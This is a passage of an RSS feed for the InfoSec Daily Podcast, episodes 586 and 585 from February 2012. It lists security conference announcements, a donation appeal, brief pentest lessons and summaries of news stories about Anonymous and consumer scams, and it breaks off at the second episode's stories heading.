		<comments>http://www.isdpodcast.com/episode-586-weekend-wrap-up-with-dr-b0n3z#comments</comments>
		<pubDate>Sun, 05 Feb 2012 02:47:32 +0000</pubDate>
		<dc:creator>Dr Bones</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3462</guid>
		<description><![CDATA[Episode 585 &#8211; Weekend Wrap-up with Dr. b0n3z InfoSec Daily Podcast Episode 586 for February 4, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez and Boris Sverdlick. &#160; Guests: aricon, oncee, coolacid, frontpage, hackett, spridel &#160; Announcements: Unsung Heroes Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or [...]]]></description>
			<content:encoded><![CDATA[<p><b>Episode 585 &#8211; Weekend Wrap-up with Dr. b0n3z</b></p>
<p><b>InfoSec Daily Podcast Episode 586 for February 4, 2012. &nbsp;Tonight&#039;s podcast is hosted by Dr. Bonez and Boris Sverdlick.</b></p>
<div style="background-color: transparent">
<p>&nbsp;</p>
<p><b><span>Guests: aricon, oncee, coolacid, frontpage, hackett, spridel</span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Announcements:</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Unsung Heroes</span></b></p>
<p dir="ltr" style="margin-right: 5pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span>http://blog.c22.cc/2012/01/13/unsung-heros</span></a></b></p>
<p><b><br />
		<span>Information Security Blogger Awards 2012</span><br />
		<span>Since we were over looked again for the Best Podcast on Security </span><span>you can email </span><a href="mailto:ashimmy@hotmail.com"><span>ashimmy@hotmail.com</span></a><span> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span>http://www.ashimmy.com</span></a><span>.</span></b></p>
<p><b><span>Brad Smith (theNurse)</span><br />
		<span>We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></b></p>
<p><b><span>Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></b></p>
<p><b><a href="http://www.social-engineer.org/brad-smith-updates/"><span>http://www.social-engineer.org/brad-smith-updates/</span></a><br />
		<a href="http://www.social-engineer.org/bradsmithdonation/"><span>http://www.social-engineer.org/bradsmithdonation/</span></a></b></p>
<p><b><span>Metasploit Framework Unleashed Cincinnati</span><br />
		<span>When: February 11, 2012. </span><br />
		<span>Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
		<a href="https://msfucincy.wordpress.com/"><span>https://msfucincy.wordpress.com/</span></a><br />
		<span>$20 donation for #HFC</span></b></p>
<p><b><span>Social Engineering Training</span><br />
		<span>When: March 5-9, 2012<br class="kix-line-break" /></p>
<p>		</span></b></p>
<p><b>Where: Seattle, Washington<br />
		<span>When: July 21-24, 2012<br class="kix-line-break" /></p>
<p>		</span></b></p>
<p><b>Where: Black Hat Vegas<br />
		<span>When: August 20-24, 2012</span><br />
		<span>Where: &nbsp;Bristol, UK</span><br />
		<span>When: &nbsp;November 12-16, 2012<br class="kix-line-break" /></p>
<p>		</span></b></p>
<p><b>Where: &nbsp;Columbia, MD <br />
		<a href="http://www.social-engineer.com/social-engineer-training"><span>http://www.social-engineer.com/social-engineer-training</span></a></b></p>
<p><b><span>InfoSec Southwest</span><br />
		<span>When: March 30-April 1</span><br />
		<span>Where: Austin, TX</span><br />
		<a href="http://www.infosecsouthwest.com/"><span>http://www.Infosecsouthwest.com</span></a></b></p>
<p><b><span>Linuxfest Northwest 2012</span><br />
		<span>When: Saturday, April 28th-29th, 2012</span><br />
		<span>Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
		<a href="http://www.linuxfestnorthwest.org/"><span>http://www.linuxfestnorthwest.org/</span></a><br />
		<span>CFP now open!</span></b></p>
<p><b><span>AIDE 2012</span><br />
		<span>When: May 21-25, 2012</span><br />
		<span>Where: MU Forensic Science Center</span><br />
		<span>Huntington, West Virginia </span><br />
		<a href="http://aide.marshall.edu/"><span>http://aide.marshall.edu</span></a><br />
		<span>CFP now open!</span></b></p>
<p><b><span>LayerOne 2012</span><br />
		<span>When: May 26-27, 2012</span><br />
		<span>Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
		<a href="http://www.layerone.org/"><span>http://www.layerone.org</span></a><br />
		<span>CFP now open!</span></b></p>
<p><b><span>DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
		<span>When: &nbsp;September 27-30, 2012</span><br />
		<span>Where: Louisville, KY</span><br />
		<a href="http://www.derbycon.com/"><span>http://www.derbycon.com</span></a></b></p>
<p><b><span>Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="http://www.isdpodcast.com/"><span> </span><span>http://www.isdpodcast.com</span></a><span> and locate the Affiliate Program link on the right hand side.</span></b></p>
<p><b><span><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Stories</span></b></p>
<p><b><br />
		<span>Pentest Lessons:</span><br />
		<span>Adam Compton &amp; Zac Wagle&#039;s should get credit for the &quot;Pentest Lessons&quot; idea. They also started a twitter account:</span><a href="https://twitter.com/pentestlessons"><span>https://twitter.com/pentestlessons</span></a><span>.</span><br />
		<span>Lesson 1: </span><span>When having a pentest performed, the customer should not disregard all alerts. While unlikely, an unrelated attack may still be happening. &nbsp;When alerts occur during a pentest, the customer should always validate them against the pentester&#039;s IP addresses.</span><br />
		<span>Lesson 2:</span><span> When using an exploit during a pentest, only use trusted and tested exploits. Do NOT assume that the exploit you just downloaded is safe.</span><br />
		<span>Lesson 3:</span><span> When performing physical pentesting (sneaking in, by passing security, picking locks, etc&hellip;) ALWAYS have a good GET OUT OF JAIL FREE CARD!</span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source: </span><a href="http://www.wired.com/threatlevel/2012/02/anonymous-scotland-yard/"><span>http://www.wired.com/threatlevel/2012/02/anonymous-scotland-yard/</span></a></b></p>
<p><b><br />
		<span>As FBI and Scotland Yard investigators recently plotted out a strategy for tracking suspects linked to Anonymous, little did they know that members of the group were eavesdropping on their conference call and recording their plans.</span></b></p>
<p><b><span>The online vigilante group has released a 17-minute clip of a Jan. 17 conference call between investigators discussing evidence gathered against members of the group as well as upcoming plans for arrests. The group also released an e-mail sent out by an FBI agent to law enforcement agents around the world with a phone number and password for accessing the conference call.</span></b></p>
<p><b><span>The FBI has confirmed to the Associated Press that the recording is authentic.</span><br />
		</b></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>&hellip;</span></b></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source:</span><span> </span><a href="http://devcentral.f5.com/weblogs/psilva/archive/2012/02/02/5-stages-of-a-data-breach.aspx"><span>http://devcentral.f5.com/weblogs/psilva/archive/2012/02/02/5-stages-of-a-data-breach.aspx</span></a></b></p>
<p><b><br />
		<span>One thing I&rsquo;ve noticed over the last couple years is that there are 5 Stages of a Data Breach:</span></b></p>
<p><b><span>Denial</span><span>: We do not believe these attacks breached our critical servers.</span><br />
		<span>Anger</span><span>: We want to make it clear that we take security seriously!</span><br />
		<span>Bargaining</span><span>: We&rsquo;d like to offer our affected customers a credit monitoring service.</span><br />
		<span>Depression</span><span>: We wish we could have done things differently.</span><br />
		<span>Acceptance</span><span>: Well, it just shows that no one is safe from hackers.</span></b></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt;margin-top: 0pt;margin-bottom: 0pt"><b><span>Source: </span><a href="http://www.mint.com/blog/consumer-iq/5-scams-you-shouldnt-fall-for-in-2012-022012/"><span>http://www.mint.com/blog/consumer-iq/5-scams-you-shouldnt-fall-for-in-2012-022012/</span></a></b></p>
<p><b><br />
		<span>Since the year is still relatively new, I thought it would be useful to look at some of the biggest traps consumers stepped into last year and offer a few tips on how to sidestep them.</span></b></p>
<p><b><span>The Better Business Bureau just released its list of the top scams of 2011, and you might recognize a few.</span></b></p>
<p><b><span>The job scam.</span><br />
		<span>The lottery scam.</span><br />
		<span>Your social media friend scam.</span><br />
		<span>The home improvement scam.</span><br />
		<span>The check cashing scam.</span></b></p>
<p><b><span>Source:</span><br />
		<a href="http://news.cnet.com/8301-27080_3-57371309-245/anonymous-hacks-lawyers-for-marine-accused-of-iraq-massacre/"><span>http://news.cnet.com/8301-27080_3-57371309-245/anonymous-hacks-lawyers-for-marine-accused-of-iraq-massacre/</span></a></b></p>
<p><b><span>Anonymous hacked into the Web site of defense lawyers for a U.S. Marine accused of leading a civilian massacre in Iraq, and have reportedly acquired e-mails exchanged by attorneys in the case. </span><br />
		<span>&#8230;</span></b></p>
</div>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-586-weekend-wrap-up-with-dr-b0n3z/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3462/0/infosec-daily-podcast-episode-586.mp3" length="19056335" type="audio/mpeg" />
		<itunes:duration>0:39:42</itunes:duration>
		<itunes:subtitle>Episode 585 &#8211; Weekend Wrap-up with Dr. b0n3z
InfoSec Daily Podcast Episode 586 for February 4, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez and Boris Sverdlick.

&#160;
Guests: aricon, oncee, coolacid, frontpage, hackett, spridel
[...]</itunes:subtitle>
		<itunes:summary>Episode 585 &#8211; Weekend Wrap-up with Dr. b0n3z
InfoSec Daily Podcast Episode 586 for February 4, 2012. &#160;Tonight&#039;s podcast is hosted by Dr. Bonez and Boris Sverdlick.

&#160;
Guests: aricon, oncee, coolacid, frontpage, hackett, spridel
&#160;
Announcements:
Unsung Heroes
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

		Information Security Blogger Awards 2012
		Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on http://www.ashimmy.com.
Brad Smith (theNurse)
		We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
http://www.social-engineer.org/brad-smith-updates/
		http://www.social-engineer.org/bradsmithdonation/
Metasploit Framework Unleashed Cincinnati
		When: February 11, 2012. 
		Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
		https://msfucincy.wordpress.com/
		$20 donation for #HFC
Social Engineering Training
		When: March 5-9, 2012
		
Where: Seattle, Washington
		When: July 21-24, 2012
		
Where: Black Hat Vegas
		When: August 20-24, 2012
		Where: &#160;Bristol, UK
		When: &#160;November 12-16, 2012
		
Where: &#160;Columbia, MD 
		http://www.social-engineer.com/social-engineer-training
InfoSec Southwest
		When: March 30-April 1
		Where: Austin, TX
		http://www.Infosecsouthwest.com
Linuxfest Northwest 2012
		When: Saturday, April 28th-29th, 2012
		Where: Bellingham Technical College &#8211; Bellingham, WA
		http://www.linuxfestnorthwest.org/
		CFP now open!
AIDE 2012
		When: May 21-25, 2012
		Where: MU Forensic Science Center
		Huntington, West Virginia 
		http://aide.marshall.edu
		CFP now open!
LayerOne 2012
		When: May 26-27, 2012
		Where: Clarion Hotel &#8211; Anaheim, CA
		http://www.layerone.org
		CFP now open!
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
		When: &#160;September 27-30, 2012
		Where: Louisville, KY
		http://www.derbycon.com
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
You don't have a sufficient version of Flash Player to display this animation.
&#160;
Stories

		Pentest Lessons:
		Adam Compton &#38; Zac Wagle&#039;s should get credit for the &#34;Pentest Lessons&#34; idea. They also started a twitter account:https://twitter.com/pentestlessons.
		Lesson 1: When having a pentest performed, the customer should not disregard all alerts. While unlikely, an unrelated attack may still be happening. &#160;When alerts occur during a pentest, the customer should always validate them against the pentester&#039;s IP addresses.
		Lesson 2: When using an exploit during a pentest, only use trusted and tested exploits. Do NOT assume that the exploit you just downloaded i[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 585 &#8211; Eyes Open, Bouncer, PHP, NATO Deficiencies, Fakebook Accounts &amp; What’s New?</title>
		<link>http://www.isdpodcast.com/episode-585-eyes-open-bouncer-php-nato-deficiencies-fakebook-accounts-whats-new</link>
		<comments>http://www.isdpodcast.com/episode-585-eyes-open-bouncer-php-nato-deficiencies-fakebook-accounts-whats-new#comments</comments>
		<pubDate>Sat, 04 Feb 2012 01:58:49 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3457</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 585 for February 3, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez, &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 585 for February 3, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Dr. Bonez,</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories<br class="kix-line-break" /><br />
